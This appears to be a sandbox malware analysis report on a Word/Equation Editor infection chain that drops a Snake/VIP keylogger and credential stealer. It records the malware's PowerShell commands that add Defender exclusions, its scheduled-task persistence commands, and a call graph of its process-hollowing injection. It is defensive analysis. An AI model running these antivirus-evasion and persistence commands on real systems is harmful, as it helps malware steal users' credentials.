                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              2024-07-26 21:45:54 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                              Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:17:45:00
                                              Start date:26/07/2024
                                              Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                              Imagebase:0x13fa30000
                                              File size:1'423'704 bytes
                                              MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:9
                                              Start time:17:45:18
                                              Start date:26/07/2024
                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                              Imagebase:0x400000
                                              File size:543'304 bytes
                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:10
                                              Start time:17:45:20
                                              Start date:26/07/2024
                                              Path:C:\Users\user\AppData\Roaming\swagodi78811.scr
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\swagodi78811.scr"
                                              Imagebase:0x8d0000
                                              File size:683'016 bytes
                                              MD5 hash:C448536AEEA36B80A15D639E31C7B847
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:12
                                              Start time:17:45:21
                                              Start date:26/07/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\swagodi78811.scr"
                                              Imagebase:0xff0000
                                              File size:427'008 bytes
                                              MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:14
                                              Start time:17:45:22
                                              Start date:26/07/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe"
                                              Imagebase:0xff0000
                                              File size:427'008 bytes
                                              MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:16
                                              Start time:17:45:23
                                              Start date:26/07/2024
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gRpkBp" /XML "C:\Users\user\AppData\Local\Temp\tmpD135.tmp"
                                              Imagebase:0x430000
                                              File size:179'712 bytes
                                              MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:19
                                              Start time:17:45:24
                                              Start date:26/07/2024
                                              Path:C:\Users\user\AppData\Roaming\swagodi78811.scr
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\AppData\Roaming\swagodi78811.scr"
                                              Imagebase:0x8d0000
                                              File size:683'016 bytes
                                              MD5 hash:C448536AEEA36B80A15D639E31C7B847
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:20
                                              Start time:17:45:25
                                              Start date:26/07/2024
                                              Path:C:\Users\user\AppData\Roaming\swagodi78811.scr
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\swagodi78811.scr"
                                              Imagebase:0x8d0000
                                              File size:683'016 bytes
                                              MD5 hash:C448536AEEA36B80A15D639E31C7B847
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.663140063.000000000043C000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000014.00000002.663684485.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:false

                                              General

                                              Target ID:21
                                              Start time:17:45:25
                                              Start date:26/07/2024
                                              Path:C:\Windows\System32\taskeng.exe
                                              Wow64 process (32bit):false
                                              Commandline:taskeng.exe {52F5B264-C702-43C6-8445-EB0747C55549} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                                              Imagebase:0xff6a0000
                                              File size:464'384 bytes
                                              MD5 hash:65EA57712340C09B1B0C427B4848AE05
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:22
                                              Start time:17:45:26
                                              Start date:26/07/2024
                                              Path:C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              Imagebase:0xaa0000
                                              File size:683'016 bytes
                                              MD5 hash:C448536AEEA36B80A15D639E31C7B847
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:23
                                              Start time:17:45:30
                                              Start date:26/07/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe"
                                              Imagebase:0x11c0000
                                              File size:427'008 bytes
                                              MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:25
                                              Start time:17:45:30
                                              Start date:26/07/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe"
                                              Imagebase:0x11c0000
                                              File size:427'008 bytes
                                              MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:27
                                              Start time:17:45:31
                                              Start date:26/07/2024
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gRpkBp" /XML "C:\Users\user\AppData\Local\Temp\tmpED3D.tmp"
                                              Imagebase:0x160000
                                              File size:179'712 bytes
                                              MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:29
                                              Start time:17:45:34
                                              Start date:26/07/2024
                                              Path:C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\gRpkBp.exe"
                                              Imagebase:0xaa0000
                                              File size:683'016 bytes
                                              MD5 hash:C448536AEEA36B80A15D639E31C7B847
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000001D.00000002.663663825.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:false

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:17.7%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:83
                                                Total number of Limit Nodes:1
                                                execution_graph 8064 28eeb9 8066 28ede4 8064->8066 8065 28ee9e 8066->8065 8068 421a70 8066->8068 8069 421a8a 8068->8069 8075 421aae 8069->8075 8082 42249b 8069->8082 8090 422415 8069->8090 8095 421e74 8069->8095 8100 4222d6 8069->8100 8104 421f16 8069->8104 8108 4224b3 8069->8108 8112 422213 8069->8112 8116 4227ce 8069->8116 8122 4221c8 8069->8122 8127 421fa7 8069->8127 8132 4220fb 8069->8132 8075->8065 8083 422712 8082->8083 8144 28e2c8 8083->8144 8148 28e2c1 8083->8148 8084 421fa8 8085 421f6d 8084->8085 8136 28dd98 8084->8136 8140 28dda0 8084->8140 8085->8075 8091 4221df 8090->8091 8092 4221f4 8091->8092 8093 28dd98 ResumeThread 8091->8093 8094 28dda0 ResumeThread 8091->8094 8092->8075 8093->8092 8094->8092 8096 421e7e 8095->8096 8152 28e8b8 8096->8152 8156 28e8ac 8096->8156 8160 28e519 8100->8160 8164 28e520 8100->8164 8101 422304 8105 421f42 8104->8105 8106 28e8b8 CreateProcessA 8104->8106 8107 28e8ac CreateProcessA 8104->8107 8105->8075 8106->8105 8107->8105 8168 28e678 8108->8168 8172 28e680 8108->8172 8109 4224d5 8109->8075 8114 28e519 WriteProcessMemory 8112->8114 8115 28e520 WriteProcessMemory 8112->8115 8113 422237 8113->8075 8114->8113 8115->8113 8117 422295 8116->8117 8118 4227db 8116->8118 8120 28e519 WriteProcessMemory 8117->8120 8121 28e520 WriteProcessMemory 8117->8121 8119 42226d 8119->8075 8120->8119 8121->8119 8123 4221ce 8122->8123 8125 28dd98 ResumeThread 8123->8125 8126 28dda0 ResumeThread 8123->8126 8124 4221f4 8124->8075 8125->8124 8126->8124 8128 421fa8 8127->8128 8130 28dd98 ResumeThread 8128->8130 8131 28dda0 ResumeThread 8128->8131 8129 4221f4 8129->8075 8130->8129 8131->8129 8176 28e3f8 8132->8176 8180 28e3f1 8132->8180 8133 42211d 8133->8075 8137 28dde4 ResumeThread 8136->8137 8139 28de36 8137->8139 8139->8085 8141 28dde4 ResumeThread 8140->8141 8143 28de36 8141->8143 8143->8085 8145 28e311 Wow64SetThreadContext 8144->8145 8147 28e38f 8145->8147 8147->8084 8149 28e311 Wow64SetThreadContext 8148->8149 8151 28e38f 8149->8151 8151->8084 8153 28e8c5 CreateProcessA 8152->8153 8155 28eb9d 8153->8155 8157 28e8b2 CreateProcessA 8156->8157 8159 28eb9d 8157->8159 8161 28e56c WriteProcessMemory 8160->8161 8163 28e60b 8161->8163 8163->8101 8165 28e56c WriteProcessMemory 8164->8165 8167 28e60b 8165->8167 8167->8101 8169 28e6cc ReadProcessMemory 8168->8169 8171 28e74a 8169->8171 8171->8109 8173 28e6cc ReadProcessMemory 8172->8173 8175 28e74a 8173->8175 8175->8109 8177 28e43c VirtualAllocEx 8176->8177 8179 28e4ba 8177->8179 8179->8133 8181 28e43c VirtualAllocEx 8180->8181 8183 28e4ba 8181->8183 8183->8133

                                                Executed Functions

                                                Function 002804D8 Relevance: 2.5, Strings: 1, Instructions: 1215COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 271 2804d8-2811c3 274 2811ca-28185c call 28076c call 28077c call 28078c * 2 call 28079c call 28078c call 28079c call 2807ac call 2807bc call 2807cc call 2807dc * 2 call 2807ec call 2807fc call 28080c call 28081c call 280d88 call 280d98 call 280da8 call 2807ec call 2807fc call 280d88 call 280d98 271->274 275 2811c5 271->275 368 28185e-28186a 274->368 369 281886 274->369 275->274 370 28186c-281872 368->370 371 281874-28187a 368->371 372 28188c-281a1b call 280db8 call 280dc8 call 280dd8 369->372 373 281884 370->373 371->373 390 281a1d-281a29 372->390 391 281a45 372->391 373->372 392 281a2b-281a31 390->392 393 281a33-281a39 390->393 394 281a4b-281b2c call 280db8 call 280dc8 391->394 395 281a43 392->395 393->395 406 281db0-281dc9 394->406 395->394 407 281dcf-281f28 call 280dd8 call 280dc8 406->407 408 281b31-281b38 406->408 453 281f2a-281f36 407->453 454 281f52 407->454 409 281b54-281b65 408->409 410 281b3a-281b51 409->410 411 281b67-281b79 409->411 410->409 413 281b7b 411->413 414 281b80-281b8e 411->414 413->414 415 281ba6-281bb7 414->415 417 281bb9-281bca 415->417 418 281b90-281ba3 415->418 419 281be3-281bf4 417->419 418->415 421 281bcc-281be0 419->421 422 281bf6-281c02 419->422 421->419 423 281c09-281c17 422->423 424 281c04 422->424 426 281c30-281c41 423->426 424->423 427 281c19-281c2d 426->427 428 281c43-281c4f 426->428 427->426 430 281c51 428->430 431 281c56-281c6f 428->431 430->431 434 281c7f-281c90 431->434 436 281c71-281c7c 434->436 437 281c92-281cac 434->437 436->434 439 281cc5-281cdc 437->439 440 281cae-281cc2 439->440 441 281cde-281cf5 439->441 440->439 443 281d17-281d31 441->443 444 281d33-281d47 443->444 445 281cf7-281d11 443->445 447 281d69-281d83 444->447 445->443 448 281d49-281d63 447->448 449 281d85-281d9e 447->449 448->447 450 281da0 449->450 451 281da5-281dad 449->451 450->451 451->406 455 281f38-281f3e 453->455 456 281f40-281f46 453->456 457 281f58-2822b5 call 280db8 call 280dc8 call 280dd8 call 280dc8 * 3 call 280de8 call 280df8 call 280dc8 454->457 458 281f50 455->458 456->458 497 2822bc-28238c call 280e08 457->497 498 2822b7 457->498 458->457 506 282397-282591 call 280e18 call 280e28 call 280e38 call 280e48 * 2 call 2807fc call 280e58 call 280e68 call 280e78 call 280e68 call 280e78 497->506 498->497
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410592653.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_280000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Ppp
                                                • API String ID: 0-99483665
                                                • Opcode ID: 250564efd27ffba731edd5c8da14d1ed7d82569e709a80f70a67e05a9a0221d1
                                                • Instruction ID: cec53097fbb3f1e474cb1df6ed44c52e37422f05f057d13aeb67c4a2f98734de
                                                • Opcode Fuzzy Hash: 250564efd27ffba731edd5c8da14d1ed7d82569e709a80f70a67e05a9a0221d1
                                                • Instruction Fuzzy Hash: 03C2D634A11219CFCB64DF64C894AD9B7B2FF8A300F5185E9E409AB365DB30AE95CF50
                                                Function 00289AB0 Relevance: .1, Instructions: 61COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410592653.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_280000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e12064e865ebf0d6cd2a11175699909206196569096325c8168a2783b654ac15
                                                • Instruction ID: 80d694ac46ea1370f6f07ad8c528890d7f0fe6aea9c0b2778d59967941656eb0
                                                • Opcode Fuzzy Hash: e12064e865ebf0d6cd2a11175699909206196569096325c8168a2783b654ac15
                                                • Instruction Fuzzy Hash: F22106B4D156188BEB18DF9BC8443EEFAF6AFC9300F14C06AD409762A4DBB409958F90
                                                Function 00422154 Relevance: .0, Instructions: 8COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410622935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_420000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 635797ed0d83a7b0ea51ec27a84eb8934cd4fec48a9f4a07349ae09cc84bb152
                                                • Instruction ID: ff8e1d502ba9d389270e161f4ef1a42d28ecb651dfc490a50cdfa06ae15df2b0
                                                • Opcode Fuzzy Hash: 635797ed0d83a7b0ea51ec27a84eb8934cd4fec48a9f4a07349ae09cc84bb152
                                                • Instruction Fuzzy Hash: 4EA00284F9F464D180402D142B410B7C1BC131F314EE13923990A334634598C052655E
                                                Function 0028E8AC Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 330processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 28e8ac-28e8b0 1 28e8b2-28e8c4 0->1 2 28e8c5-28e951 0->2 1->2 5 28e99a-28e9c2 2->5 6 28e953-28e96a 2->6 9 28ea08-28ea5e 5->9 10 28e9c4-28e9d8 5->10 6->5 11 28e96c-28e971 6->11 19 28ea60-28ea74 9->19 20 28eaa4-28eb9b CreateProcessA 9->20 10->9 21 28e9da-28e9df 10->21 12 28e973-28e97d 11->12 13 28e994-28e997 11->13 16 28e97f 12->16 17 28e981-28e990 12->17 13->5 16->17 17->17 18 28e992 17->18 18->13 19->20 28 28ea76-28ea7b 19->28 39 28eb9d-28eba3 20->39 40 28eba4-28ec89 20->40 22 28e9e1-28e9eb 21->22 23 28ea02-28ea05 21->23 25 28e9ed 22->25 26 28e9ef-28e9fe 22->26 23->9 25->26 26->26 29 28ea00 26->29 30 28ea7d-28ea87 28->30 31 28ea9e-28eaa1 28->31 29->23 33 28ea89 30->33 34 28ea8b-28ea9a 30->34 31->20 33->34 34->34 36 28ea9c 34->36 36->31 39->40 52 28ec99-28ec9d 40->52 53 28ec8b-28ec8f 40->53 54 28ecad-28ecb1 52->54 55 28ec9f-28eca3 52->55 53->52 56 28ec91 53->56 58 28ecc1-28ecc5 54->58 59 28ecb3-28ecb7 54->59 55->54 57 28eca5 55->57 56->52 57->54 61 28ecfb-28ed06 58->61 62 28ecc7-28ecf0 58->62 59->58 60 28ecb9 59->60 60->58 65 28ed07 61->65 62->61 65->65
                                                APIs
                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0028EB7F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410592653.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_280000_swagodi78811.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID: l0e$l0e$l0e
                                                • API String ID: 963392458-2815422308
                                                • Opcode ID: 8defbb5e72c29bad7815eda4acd677fb91db34f6f4f6d17fab4c568b32a72f9f
                                                • Instruction ID: e0cad89dfc7016fe901b3fd3802149bc03820157ce8d7fcaa01f6be70dd816e8
                                                • Opcode Fuzzy Hash: 8defbb5e72c29bad7815eda4acd677fb91db34f6f4f6d17fab4c568b32a72f9f
                                                • Instruction Fuzzy Hash: 5EC14B74D112698FDF24DFA8C841BEDBBB1BF09300F0091AAD819B7290DB749A95CF95
                                                Function 0028E8B8 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 323processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 67 28e8b8-28e951 70 28e99a-28e9c2 67->70 71 28e953-28e96a 67->71 74 28ea08-28ea5e 70->74 75 28e9c4-28e9d8 70->75 71->70 76 28e96c-28e971 71->76 84 28ea60-28ea74 74->84 85 28eaa4-28eb9b CreateProcessA 74->85 75->74 86 28e9da-28e9df 75->86 77 28e973-28e97d 76->77 78 28e994-28e997 76->78 81 28e97f 77->81 82 28e981-28e990 77->82 78->70 81->82 82->82 83 28e992 82->83 83->78 84->85 93 28ea76-28ea7b 84->93 104 28eb9d-28eba3 85->104 105 28eba4-28ec89 85->105 87 28e9e1-28e9eb 86->87 88 28ea02-28ea05 86->88 90 28e9ed 87->90 91 28e9ef-28e9fe 87->91 88->74 90->91 91->91 94 28ea00 91->94 95 28ea7d-28ea87 93->95 96 28ea9e-28eaa1 93->96 94->88 98 28ea89 95->98 99 28ea8b-28ea9a 95->99 96->85 98->99 99->99 101 28ea9c 99->101 101->96 104->105 117 28ec99-28ec9d 105->117 118 28ec8b-28ec8f 105->118 119 28ecad-28ecb1 117->119 120 28ec9f-28eca3 117->120 118->117 121 28ec91 118->121 123 28ecc1-28ecc5 119->123 124 28ecb3-28ecb7 119->124 120->119 122 28eca5 120->122 121->117 122->119 126 28ecfb-28ed06 123->126 127 28ecc7-28ecf0 123->127 124->123 125 28ecb9 124->125 125->123 130 28ed07 126->130 127->126 130->130
                                                APIs
                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0028EB7F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410592653.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_280000_swagodi78811.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID: l0e$l0e$l0e
                                                • API String ID: 963392458-2815422308
                                                • Opcode ID: b5d469a95fbf778ce1512ecc121edad2d14368e4fb0a75c68c7efcd7ed209ed2
                                                • Instruction ID: 6802adc0b839c4118069c00983d3e944646e1cb7e0501b2f1dd8b94083114d71
                                                • Opcode Fuzzy Hash: b5d469a95fbf778ce1512ecc121edad2d14368e4fb0a75c68c7efcd7ed209ed2
                                                • Instruction Fuzzy Hash: C1C14A74D112298FDF24DFA8C841BEDBBB1BF09300F0091AAD819B7290DB749A95CF95
                                                Function 00420B12 Relevance: 5.1, Strings: 4, Instructions: 68COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 171 420b12-420c44 call 420fa8 189 420c47 call 4210ba 171->189 190 420c47 call 4210c8 171->190 187 420c4d-420c50 188 420c59 187->188 189->187 190->187
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410622935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_420000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4ze$4ze$4ze$`~e
                                                • API String ID: 0-4279224308
                                                • Opcode ID: 57f1469233f19f6ea6438d525ce7d732bad28e87969f2f5b9bfa2c993fa3830c
                                                • Instruction ID: 519b331a93b36dff699000822ddd60ea36507538e78da1afd08284bac0b75f74
                                                • Opcode Fuzzy Hash: 57f1469233f19f6ea6438d525ce7d732bad28e87969f2f5b9bfa2c993fa3830c
                                                • Instruction Fuzzy Hash: 7D31B474E013099FDB05DFA0D855AAEBBB3EF89301F205129D80967395CA315E42CF90
                                                Function 00420B22 Relevance: 2.5, Strings: 2, Instructions: 39COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 253 420b22-420b3e call 420ea8 256 420cfc-420d0c call 420ee8 253->256
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410622935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_420000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4ze$`~e
                                                • API String ID: 0-3519593027
                                                • Opcode ID: 4948a9101572af8936159aec2e0ececee9a3067dd91288aa923f762dc1575bf6
                                                • Instruction ID: 61d7098226e2129b6b35d35d44932d4bbf70c88b0d94506083921116e4c28287
                                                • Opcode Fuzzy Hash: 4948a9101572af8936159aec2e0ececee9a3067dd91288aa923f762dc1575bf6
                                                • Instruction Fuzzy Hash: 73116D78E052199FCB04DFE4E9948ACBBB6FB49301F20512AE80AAB355D7305946CF01
                                                Function 0028E519 Relevance: 1.6, APIs: 1, Instructions: 120injectionCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 538 28e519-28e58b 540 28e58d-28e59f 538->540 541 28e5a2-28e609 WriteProcessMemory 538->541 540->541 543 28e60b-28e611 541->543 544 28e612-28e664 541->544 543->544
                                                APIs
                                                • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0028E5F3
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410592653.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_280000_swagodi78811.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 576e014e48be72846b979f64a1535304255779ac0f79dbf60040733bbcf2338e
                                                • Instruction ID: 51ce354a0d596b994d182619dced207377513c5b8ddcd39f3ed458955e45d7a5
                                                • Opcode Fuzzy Hash: 576e014e48be72846b979f64a1535304255779ac0f79dbf60040733bbcf2338e
                                                • Instruction Fuzzy Hash: 8941B9B5D012589FCF00CFA9D984AEEFBF1BB49314F24942AE815B7250D338AA55CF64
                                                Function 0028E520 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 549 28e520-28e58b 551 28e58d-28e59f 549->551 552 28e5a2-28e609 WriteProcessMemory 549->552 551->552 554 28e60b-28e611 552->554 555 28e612-28e664 552->555 554->555
                                                APIs
                                                • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0028E5F3
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410592653.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_280000_swagodi78811.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 07e8fe25a7b3e7a609e29b2059aea4c28ccdc888094e1a7fae5d90173286773d
                                                • Instruction ID: 54ebf885dfeb98fe7dc14b5eea7686c496c0f624a6e2d579d11e1a27770ac525
                                                • Opcode Fuzzy Hash: 07e8fe25a7b3e7a609e29b2059aea4c28ccdc888094e1a7fae5d90173286773d
                                                • Instruction Fuzzy Hash: 9C41AAB4D012589FCF00CFA9D984AEEFBF1BB49314F24942AE814B7250D338AA55CF64
                                                Function 0028E678 Relevance: 1.6, APIs: 1, Instructions: 111COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 560 28e678-28e748 ReadProcessMemory 563 28e74a-28e750 560->563 564 28e751-28e7a3 560->564 563->564
                                                APIs
                                                • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0028E732
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410592653.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_280000_swagodi78811.jbxd
